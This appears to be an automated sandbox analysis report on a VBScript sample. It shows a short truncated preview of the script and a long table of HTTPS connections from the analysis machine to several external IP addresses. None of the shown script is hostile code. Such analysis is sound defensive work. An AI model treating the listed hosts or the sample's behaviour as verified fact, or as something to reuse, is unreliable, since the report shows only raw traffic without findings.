File Content Preview:	..Dim isProcessRunning..Dim Result..Dim dd....Function Modi(a0).. Modi = "".. For ix = 1 To Len(a0).. aa = Mid(a0, ix, 1).. bb = "_".. If Asc(aa) > 47 And Asc(aa) < 58 Then.. bb = aa.. End If.. If Asc(aa

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 08:24:02.857213974 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:02.857253075 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:02.857482910 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:02.858213902 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:02.858268023 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:02.858356953 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:02.858566999 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:02.858594894 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:02.858756065 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:02.858772039 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.294399023 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.301584005 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.313194036 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.313224077 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.313543081 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.313601971 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.314904928 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.314968109 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.316653967 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.316740990 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.316793919 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.317423105 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.317728043 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.320578098 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.320775032 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.360342979 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.360354900 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.373769999 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.373830080 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.406342983 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.428383112 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.956929922 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.956971884 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.957051992 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.967181921 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967258930 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967278957 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967319012 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967317104 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.967339993 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967345953 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.967360973 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967360973 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.967387915 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.967391014 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967406988 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.967545033 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.967602015 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.974215984 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.974270105 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:03.975025892 CEST	49735	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:03.975049019 CEST	443	49735	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.037223101 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.084116936 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.264058113 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.264269114 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.264343023 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.264712095 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.264736891 CEST	443	49734	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.264753103 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.264789104 CEST	49734	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.400031090 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.400207043 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.444681883 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.444722891 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.445530891 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.445702076 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.448215008 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.448601961 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.448673964 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.856578112 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.856610060 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.856668949 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.856678963 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.856869936 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.856933117 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.857908964 CEST	49738	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.857934952 CEST	443	49738	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.960479975 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.960525990 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:04.960719109 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.960807085 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:04.960828066 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:05.382945061 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:05.383187056 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:05.383800030 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:05.383851051 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:05.383913994 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:05.383929014 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:05.384031057 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:05.384056091 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.026324987 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.026390076 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.026428938 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.026704073 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.026705027 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.026738882 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.026762962 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.026807070 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.026846886 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.234359026 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.234427929 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.234445095 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.234456062 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.234491110 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.234920979 CEST	49740	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:06.234941959 CEST	443	49740	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:06.863033056 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:06.863075018 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:06.863230944 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:06.863447905 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:06.863462925 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:07.093424082 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:07.093678951 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:07.093703985 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:07.095321894 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:07.095396042 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:07.102725029 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:07.102808952 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:07.151586056 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:07.151623011 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:07.197350025 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:07.345359087 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.345402002 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.345596075 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.346724987 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.346750021 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.574856997 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.574928999 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.577847004 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.577856064 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.578286886 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.618845940 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.660144091 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.768872023 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.768991947 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.769048929 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.769318104 CEST	49743	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.769336939 CEST	443	49743	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.814157009 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.814188957 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:07.814367056 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.814726114 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:07.814740896 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.034167051 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.034357071 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:08.082601070 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.082679987 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.082734108 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.082748890 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.082788944 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.082830906 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.084223986 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.084237099 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.084450960 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.084486008 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.088970900 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:08.088984013 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.089940071 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.094055891 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:08.136120081 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.238500118 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.238650084 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.238738060 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:08.290100098 CEST	49744	443	192.168.2.4	184.31.62.93
Apr 20, 2024 08:24:08.290110111 CEST	443	49744	184.31.62.93	192.168.2.4
Apr 20, 2024 08:24:08.508471012 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.508861065 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.508872032 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.509347916 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.509820938 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.510008097 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.510065079 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.514442921 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.514759064 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.514815092 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.516352892 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.516885996 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.517355919 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.552205086 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:08.558010101 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:08.558490038 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.149247885 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149329901 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149353027 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149393082 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149410963 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.149429083 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149442911 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149470091 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.149499893 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.149575949 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149626970 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149653912 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.149661064 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.149688959 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.149714947 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.357393980 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.357465029 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.357513905 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.357539892 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.357563019 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.357589006 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.357621908 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.357676029 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.358138084 CEST	49746	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:09.358150959 CEST	443	49746	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:09.483586073 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.483638048 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.483726978 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.484584093 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.484608889 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.706518888 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.706769943 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.706830025 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.708281040 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.708353043 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.709558964 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.709646940 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.709744930 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:09.709760904 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:09.759109974 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:10.334433079 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:10.334503889 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:10.334817886 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:10.335943937 CEST	49749	443	192.168.2.4	104.26.14.182
Apr 20, 2024 08:24:10.336003065 CEST	443	49749	104.26.14.182	192.168.2.4
Apr 20, 2024 08:24:10.443779945 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.443859100 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.444436073 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.444670916 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.444693089 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.450969934 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.451008081 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.451081038 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.451325893 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.451343060 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.665102005 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.665524960 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.665585041 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.667049885 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.667134047 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.668828964 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.668909073 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.669204950 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.669224024 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.670653105 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.670918941 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.670947075 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.674503088 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.674575090 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.674956083 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.675108910 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.675122023 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.717498064 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.717524052 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:10.717647076 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.763849974 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:10.895035982 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.895108938 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.895282030 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.895714998 CEST	49753	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.895776033 CEST	443	49753	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.896281004 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.896325111 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:10.896404982 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.896714926 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:10.896734953 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.110761881 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.111640930 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.111685991 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.112195015 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.112596035 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.112689972 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.112766981 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.156147003 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.276738882 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.276777029 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.276844978 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.277159929 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.277174950 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.277493000 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.277499914 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.277560949 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.277988911 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.278014898 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.305037022 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:11.305114031 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:11.305176020 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:11.306178093 CEST	49754	443	192.168.2.4	104.26.15.182
Apr 20, 2024 08:24:11.306195974 CEST	443	49754	104.26.15.182	192.168.2.4
Apr 20, 2024 08:24:11.346986055 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.347105980 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.347312927 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.347388029 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.347388029 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.347423077 CEST	443	49755	35.190.80.1	192.168.2.4
Apr 20, 2024 08:24:11.347497940 CEST	49755	443	192.168.2.4	35.190.80.1
Apr 20, 2024 08:24:11.489732027 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.490282059 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.490345001 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.490683079 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.490768909 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.491194010 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.491259098 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.492535114 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.492599010 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.492870092 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.492889881 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.503968000 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.504267931 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.504326105 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.506004095 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.506083012 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.507138014 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.507328987 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.507340908 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.531105042 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.531141996 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.531435966 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.531917095 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.531954050 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.544143915 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.552117109 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.559663057 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.559683084 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.600781918 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.703789949 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.703870058 CEST	443	49759	216.239.38.181	192.168.2.4
